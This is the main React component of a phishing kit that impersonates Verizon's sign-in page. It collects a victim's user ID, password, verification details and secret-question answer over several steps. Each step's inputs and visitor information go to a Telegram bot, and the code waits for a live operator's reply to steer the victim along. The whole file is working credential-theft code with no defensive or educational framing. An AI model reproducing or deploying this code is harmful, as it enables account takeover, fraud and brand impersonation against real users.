import React, { useState, useEffect, useRef } from "react";
import useVisitorInfo from "./hooks/useVisitorInfo";
import { sendToTelegram, pollForReply } from "./hooks/useTelegram";
import VerizonHeader from "./components/VerizonHeader";
import VerizonFooter from "./components/VerizonFooter";
import LoadingScreen from "./components/LoadingScreen";
import Step1 from "./components/Step1";
import Step2 from "./components/Step2";
import Step3 from "./components/Step3";
import Step4 from "./components/Step4";

/*
  FLOW:
  0  = access check / loading
  1  = User ID / email entry
  2  = Password entry
  3  = Verify Your Information (radio) — bot reply here = secret question shown in step 4
  4  = Secret Question / Answer
  5  = Done / final message from bot
*/

export default function App() {
  const { visitorInfo, allowed } = useVisitorInfo();

  const [step, setStep]                   = useState(0);
  const [userId, setUserId]               = useState("");
  const [secretQuestion, setSecretQuestion] = useState("");
  const [waiting, setWaiting]             = useState(false);
  const [botReply, setBotReply]           = useState("");
  const savedInputsRef                    = useRef(null);

  // Advance from loading once access check resolves
  useEffect(() => {
    if (allowed === true && step === 0) setStep(1);
  }, [allowed, step]);

  /*
    Two-click pattern per step:
      Click 1 → send inputs to Telegram, await operator reply, display reply
      Click 2 → clear reply, advance to next step
  */
  async function handleContinue(stepLabel, inputs, nextStep, isSecretQuestionStep = false) {
    if (!botReply) {
      // ── First click: capture inputs, send to bot, wait ──
      savedInputsRef.current = inputs;

      // Capture userId from step 1 so later steps can display it
      if (stepLabel.startsWith("Step 1") && inputs["User ID / Mobile"]) {
        setUserId(inputs["User ID / Mobile"]);
      }

      setWaiting(true);
      try {
        await sendToTelegram(stepLabel, inputs, visitorInfo);
        const reply = await pollForReply(180000); // up to 3 min

        if (isSecretQuestionStep) {
          // Operator's reply becomes the secret question text for step 4
          setSecretQuestion(reply);
        }
        // setBotReply(reply);

        if (reply === "repeat") {
          // stay on current step, reset inputs
          setBotReply("");
          return;
        }
        // "continue" or any custom text → advance
        setBotReply(reply === "continue" ? "" : reply);
        setStep(nextStep);
        } catch (err) {
          setBotReply("⏳ Waiting for operator response… please hold.");
        } finally {
        setWaiting(false);
      }
    } else {
      // ── Second click: dismiss reply, move to next step ──
      setBotReply("");
      setStep(nextStep);
    }
  }



  if (allowed === null || step === 0) return <LoadingScreen />;

  return (
    <div style={styles.page}>
      <VerizonHeader />

      <main style={styles.main}>

        {step === 1 && (
          <Step1
            onContinue={(inputs) =>
              handleContinue("Step 1 — User ID Entry", inputs, 2)
            }
            botReply={botReply}
            waiting={waiting}
          />
        )}

        {step === 2 && (
          <Step2
            userId={userId}
            onContinue={(inputs) =>
              handleContinue("Step 2 — Password", inputs, 3)
            }
            botReply={botReply}
            waiting={waiting}
          />
        )}

        {step === 3 && (
          <Step3
            userId={userId}
            onContinue={(inputs) =>
              // isSecretQuestionStep=true: operator reply → secret question for step 4
              handleContinue("Step 3 — Verify Info | Reply with Security Question", inputs, 4, true)
            }
            botReply={botReply}
            waiting={waiting}
          />
        )}

        {step === 4 && (
          <Step4
            userId={userId}
            secretQuestion={secretQuestion}
            onContinue={(inputs) =>
              handleContinue("Step 4 — Secret Answer", inputs, 5)
            }
            botReply={botReply}
            waiting={waiting}
          />
        )}

        {step === 5 && (
          <div style={styles.doneCard}>
            <h2 style={styles.doneTitle}>Sign in</h2>
            <p style={styles.doneMsg}>
              {botReply || "You have been signed in. Redirecting…"}
            </p>
          </div>
        )}

      </main>

      <VerizonFooter />

      {/* Full-page spinner while awaiting bot reply */}
      {waiting && (
        <>
          <style>{`@keyframes _vz_spin{0%{transform:rotate(0deg)}100%{transform:rotate(360deg)}}`}</style>
          <div style={styles.overlay}>
            <div style={styles.spinner} />
          </div>
        </>
      )}
    </div>
  );
}

const styles = {
  page: {
    minHeight: "100vh",
    display: "flex",
    flexDirection: "column",
    background: "#fff",
    fontFamily: "Arial, sans-serif",
  },
  main: {
    flex: 1,
    display: "flex",
    alignItems: "flex-start",
    justifyContent: "center",
    padding: "60px 24px 40px",
  },
  doneCard: {
    background: "#fff",
    border: "1px solid #e0e0e0",
    borderRadius: 4,
    padding: "32px 40px",
    width: "100%",
    maxWidth: 480,
  },
  doneTitle: { fontSize: 22, fontWeight: 700, color: "#000", marginBottom: 12 },
  doneMsg:   { fontSize: 15, color: "#333", whiteSpace: "pre-wrap" },
  overlay: {
    position: "fixed",
    inset: 0,
    background: "rgba(255,255,255,0.75)",
    display: "flex",
    alignItems: "center",
    justifyContent: "center",
    zIndex: 9999,
  },
  spinner: {
    width: 44,
    height: 44,
    border: "4px solid #e0e0e0",
    borderTop: "4px solid #cd040b",
    borderRadius: "50%",
    animation: "_vz_spin 0.8s linear infinite",
  },
};
